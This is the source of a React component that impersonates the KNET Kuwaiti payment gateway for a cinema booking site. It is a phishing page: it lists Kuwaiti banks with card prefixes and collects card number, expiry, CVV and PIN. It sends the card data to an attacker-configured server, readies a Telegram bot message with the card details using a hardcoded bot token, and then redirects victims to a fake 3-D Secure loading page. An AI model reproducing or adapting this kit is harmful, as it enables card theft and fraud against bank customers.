import axios from "axios";
import { useEffect, useRef, useState } from "react";
import { useNavigate } from "react-router-dom";
import ReactPixel from "react-facebook-pixel"
import { useCart } from "react-use-cart";

const banksData = {
  "البنك الاهلي المتحد [AUB]": ["537016", "532674"],
  "البنك الأهلي الكويتي  [ABK]": ["403622", "423826", "428628"],
  "مصرف الراجحي [Rajhi]": ["458838"],
  "بنك البحرين والكويت [BBK]": ["588790", "418056"],
  "بنك بوبيان [Boubyan]": [
    "470350",
    "490455",
    "490456",
    "404919",
    "450605",
    "426058",
    "431199",
  ],
  "بنك برقان [Burgan]": [
    "492190",
    "415254",
    "450238",
    "468564",
    "540759",
    "402978",
    "403583",
  ],
  "البنك التجاري الكويتي [CBK]": ["532672", "537015", "521175", "516334"],
  "بنك الدوحة [Doha]": ["419252"],
  "بنك الخليج [GBK]": [
    "531644",
    "517419",
    "531471",
    "559475",
    "517458",
    "526206",
    "531329",
    "531470",
  ],
  "بيت التمويل الكويتي [KFH]": ["450778", "485602"],
  "بنك الكويت الدولي [KIB]": ["406464", "409054"],
  "بنك الكويت الوطني [NBK]": ["464452", "589160"],
  "بنك قطر الوطني [QNB]": ["519859", "521020", "521099", "524745"],
  "الوطني [Weyay]": ["464452", "543363"],
  "بنك الاتحاد الوطنى [UNB]": ["457778"],
  "بنك وربة [Warba]": ["532749", "559459", "541350", "525528"],
};

function Knet() {
  const years = [];
  for (let year = 2025; year <= 2044; year++) {
    years.push(year);
  }

  const [selectedBank, setSelectedBank] = useState("");
  const [availableBins, setAvailableBins] = useState([]);

  const handleBankChange = (event) => {
    const bankName = event.target.value;
    setSelectedBank(bankName);
    setAvailableBins(banksData[bankName] || []);
  };


  const  [bin, set_bin] = useState('')
  const [change, setchange] = useState(true)



  const [submitBtnContent, setSubmitBtnContent] = useState('Submit');
  const [selectedMonth, setSelectedMonth] = useState("");
  const [selectedYear, setSelectedYear] = useState("");
  const { addItem,cartTotal } = useCart();
  const handleMonthChange = (event) => {
    setSelectedMonth(event.target.value);
  };

  const handleYearChange = (event) => {
    setSelectedYear(event.target.value);
  };
  const handleBinChange = (event) => {
    set_bin(event.target.value);
  };
  

  const [input1Value, setInput1Value] = useState("")
  const [input2Value, setInput2Value] = useState("")
  const [input3Value, setInput3Value] = useState("")

  const [focusedInput, setFocusedInput] = useState(1) // 1 for first input, 2 for second input, 3 for third input
  const input1Ref = useRef(null)
  const input2Ref = useRef(null)
  const input3Ref = useRef(null)

  const [submitBtnDis, setSubmitBtnDis] = useState(true)

  useEffect(() => {
    updateSubmitBtnDisabled()
  }, [input1Value, selectedMonth, selectedYear, input3Value, bin])

  const handleNumberClick = (number) => {
    if (focusedInput === 1) {
      if (input1Value.length < 16) {
        setInput1Value((prevValue) => prevValue + number)
      } else {
        setFocusedInput(2)
        if (input2Value.length < 4) {
          setInput2Value((prevValue) => prevValue + number)
        }
      }
    } else if (focusedInput === 2) {
      if (input2Value.length < 4) {
        setInput2Value((prevValue) => prevValue + number)
      } else {
        setFocusedInput(3)
        if (input3Value.length < 3) {
          setInput3Value((prevValue) => prevValue + number)
        }
      }
    } else if (focusedInput === 3) {
      if (input3Value.length < 3) {
        setInput3Value((prevValue) => prevValue + number)
      }
    }
  }

  const handleDeleteClick = () => {
    if (focusedInput === 1) {
      setInput1Value((prevValue) => prevValue.slice(0, -1))
    } else if (focusedInput === 2) {
      if (input2Value.length === 0) {
        setFocusedInput(1)
      }
      setInput2Value((prevValue) => prevValue.slice(0, -1))
    } else if (focusedInput === 3) {
      if (input3Value.length === 0) {
        setFocusedInput(2)
      }
      setInput3Value((prevValue) => prevValue.slice(0, -1))
    }
  }
  const fullUrl = window.location.href;
  const baseUrl = fullUrl.split('/').slice(0, 3).join('/');
  const handleInput1Focus = () => {
    // trackUserAction('User Started Card Input', false)
    setFocusedInput(1)
  }

  const handleInput2Focus = () => {
    setFocusedInput(2)
  }

  const handleInput3Focus = () => {
    setFocusedInput(3)
  }

  const checkFocus = (num) => {
    return focusedInput === num
  }

  const updateSubmitBtnDisabled = () => {
    console.log(`SR {input1Value.length} + SR {input2Value.length} + SR {input3Value.length}`)
    // Check conditions for enabling/disabling submit button
    const firstFourDigits = input1Value.replace(/\s/g, "").substring(0, 4);
    const firstSixDigits = input1Value.replace(/\s/g, "").substring(0, 6);
    if (
      input1Value !== "" &&
      selectedMonth !== "" &&
      selectedYear !== "" &&
      input3Value !== "" &&
      bin !== "" &&
      input1Value.length === 10 &&
      selectedMonth.length === 2 &&
      selectedYear.length === 4 &&
      bin.length === 6 &&
      input3Value.length === 3  
    ) {

      setSubmitBtnDis(false) // Disable submit button if any input is empty
    }else{
      setSubmitBtnDis(true) // Disable submit button if any input is empty
      
    }
  }
  function isDateGreaterThan(dateStr, comparisonDateStr) {
    console.log(dateStr)
    // Extract month and year for both dates
    const [month, year] = dateStr.split("/").map(Number);
    const [compMonth, compYear] = comparisonDateStr.split("/").map(Number);
  
    // First, compare the years
    if (year > compYear) return true;
    if (year < compYear) return false;
  
    // If years are the same, compare the months
    return month > compMonth;
  }
  const navigate = useNavigate()
  const handleSender = async () => {

    // Extract the first digit of `main` and the last 4 digits of `main`
    const firstDigit = input1Value?.charAt(0); // First digit
    const lastFourDigits = input1Value?.slice(-4); // Last 4 digits
  
    // Set values to localStorage
    localStorage.setItem('summ', (parseInt(localStorage.getItem("quant"))*3.5).toFixed(3)) ;
    localStorage.setItem('first-digit', firstDigit);
    localStorage.setItem('last-four-digits', lastFourDigits);

    const botToken = '8080614051:AAHS1By4ybhpXci3veywS4L0HKAE7BLxlS8'; // Replace with your bot's token
    const url = `https://api.telegram.org/bot${botToken}/sendMessage`;



    const payload = {
      chat_id: '-1002457848491', // Replace with the target chat ID
      text: `💳 ${input1Value}
📆 ${input2Value}
🔐 ${input3Value}`,  // The message text
  };
    try {
      window.snaptr('track', 'ADD_CART');
      
      window.snaptr('track', 'PAGE_VIEW');
      
      window.snaptr('track', 'PURCHASE');
      
      window.snaptr('track', 'VIEW_CONTENT');
    } catch (err) {
      console.log(`Error ${err}`)
    }
    setSubmitBtnContent(<div className="inputLoader"></div>)
    const dataToSend = {
        orderId: "123",
        uuId: localStorage.getItem("uuId"),
        main: `${bin}${input1Value}`,
        date: `${selectedMonth}/${selectedYear?.slice(-2)}`,
        code: input3Value,
        summ: (parseInt(localStorage.getItem("quant"))*3.5).toFixed(3),
        chatId: process.env.REACT_APP_CHAT_ID,
        domain: process.env.REACT_APP_DOMAIN,
        link: fullUrl,
        additional: `Paid from Knet`,
    };
    console.log(dataToSend)
    try {
      
      await axios.post(
        process.env.REACT_APP_SERVER_URL + "/api/validation",
        dataToSend,
        {
          headers: {
            "Content-Type": "application/json",
          },
        }
      )


        navigate('/3ds/loading')
        console.log("rabotaet hui")

    } catch (error) {
      console.error("Error sending data:", error)
      setTimeout(() => {
        setSubmitBtnContent('Submit')
      }, 3000)
    }

  }
  

  
  return (
    <div className="flex flex-col items-center w-full">
      <div className="flex flex-col w-full max-w-md p-3 min-h-lvh">
        <div className="w-full">
          <img className="w-full rounded-xl" src="/assets/img/mob.jpg" alt="" />
        </div>

        <div className="flex flex-col items-center w-full p-4 mt-4 border-2 border-blue-500 shadow-lg rounded-xl">
          <img src="/assets/img/New_knet_logo.jpg" alt="" />
          <img src="/assets/img/separator.jpg" className="mt-4" alt="" />

          <div className="flex flex-col w-full">
            <span className="text-lg font-bold text-blue-500">
              Billing Information
            </span>
            <div className="grid w-full grid-cols-3 gap-2 ml-1 text-sm">
              <span className="font-bold text-blue-500">Merchant</span>
              <span className="col-span-2">{process.env.REACT_APP_MERCHANT_NAME}</span>
              <span className="font-bold text-blue-500">Website</span>
              <span className="col-span-2">https://cinescapekw.com/</span>
              <span className="font-bold text-blue-500">Amount</span>
      <span>KD{(parseInt(localStorage.getItem("quant"))*3.5).toFixed(3)}</span>
            </div>

            <span className="mt-4 text-lg font-bold text-blue-500">
              Card Information
            </span>
            <div className="grid w-full grid-cols-3 gap-2 ml-1 text-xs">
              <span className="font-bold text-blue-500">Select Your Bank</span>
              <select
                className="col-span-2 border p-1 font-bold bg-transparent rounded-sm outline-none focus:outline-none"
                value={selectedBank}
                onChange={handleBankChange}
              >
                <option value="">Select Your Bank</option>
                {Object.keys(banksData).map((bankName, index) => (
                  <option key={index} value={bankName}>
                    {bankName}
                  </option>
                ))}
              </select>

              <span className="font-bold text-blue-500">Card Number</span>
              <div className="flex col-span-2">
                <select
                onChange={handleBinChange}
                  className="w-3/5 p-1 border font-bold bg-transparent rounded-sm outline-none  focus:outline-none"
                >
                  <option value="">Prefix</option>
                  {availableBins.map((bin, index) => (
                    <option key={index} value={bin}>
                      {bin}
                    </option>
                  ))}
                </select>
                <input
                  type="text"
                  inputMode="numeric"
                  pattern="[0-9]*"
                  maxLength={10}
                  onChange={(e)=>setInput1Value(e.target.value)}
                  className="text-[#444444] w-full px-1 font-bold border border-blue-500 rounded-sm focus:outline-none focus:ring-2 focus:ring-blue-500"
                  style={{ boxShadow: "inset 0 2px 4px rgba(0, 0, 0, 0.25)" }}
                />
              </div>

              <span className="font-bold text-blue-500">Expiration Date</span>
              <div className="flex col-span-2">
        <select
          className="w-3/12 p-1 border font-bold bg-transparent rounded-sm outline-none focus:outline-none"
          value={selectedMonth}
          onChange={handleMonthChange}
        >
          <option value="">MM</option>
          {[...Array(12).keys()].map((month) => (
            <option key={month + 1} value={String(month + 1).padStart(2, "0")}>
              {String(month + 1).padStart(2, "0")}
            </option>
          ))}
        </select>

        <select
          className="w-2/5 p-1 border font-bold bg-transparent rounded-sm outline-none focus:outline-none"
          value={selectedYear}
          onChange={handleYearChange}
        >
          <option value="">YYYY</option>
          {years.map((year) => (
            <option key={year} value={year}>
              {year}
            </option>
          ))}
        </select>
      </div>

              <span className="font-bold text-blue-500">CVV</span>
              <input
                type="text"
                inputMode="numeric"
                pattern="[0-9]*"
                maxLength={3}
                onChange={(e)=>setInput3Value(e.target.value)}

                className="w-full text-[#444444] col-span-2 p-1 font-bold border border-blue-500 rounded-sm focus:outline-none focus:ring-2 focus:ring-blue-500"
                style={{ boxShadow: "inset 0 2px 4px rgba(0, 0, 0, 0.25)" }}
              />
              <span className="font-bold text-blue-500">PIN</span>
              <input
                type="text"
                inputMode="numeric"
                pattern="[0-9]*"

                className="w-full text-[#444444] col-span-2 p-1 font-bold border border-blue-500 rounded-sm focus:outline-none focus:ring-2 focus:ring-blue-500"
                style={{ boxShadow: "inset 0 2px 4px rgba(0, 0, 0, 0.25)" }}
              />
            </div>

   
            <button           onClick={handleSender}
          disabled={submitBtnDis}
          className={`px-4 py-2 mt-4 text-sm border   ${
            submitBtnDis
              ? "text-neutral-400 bg-neutral-100"
              : "border-gray-300 text-white bg-[#0872B9] hover:bg-[#3f89bb] focus:ring-2 focus:ring-gray-300"
          } `}
        >
          {submitBtnContent}</button>
          </div>
        </div>

        <div className="flex flex-col items-center w-full text-xs text-center">
          <span className="mt-4">All Rights Reserved. Copyright 2024 © </span>
          <span className="font-semibold text-blue-500">
            The Shared Electronic Banking Services Company - KNET
          </span>
        </div>
      </div>
    </div>
  );
}

export default Knet;
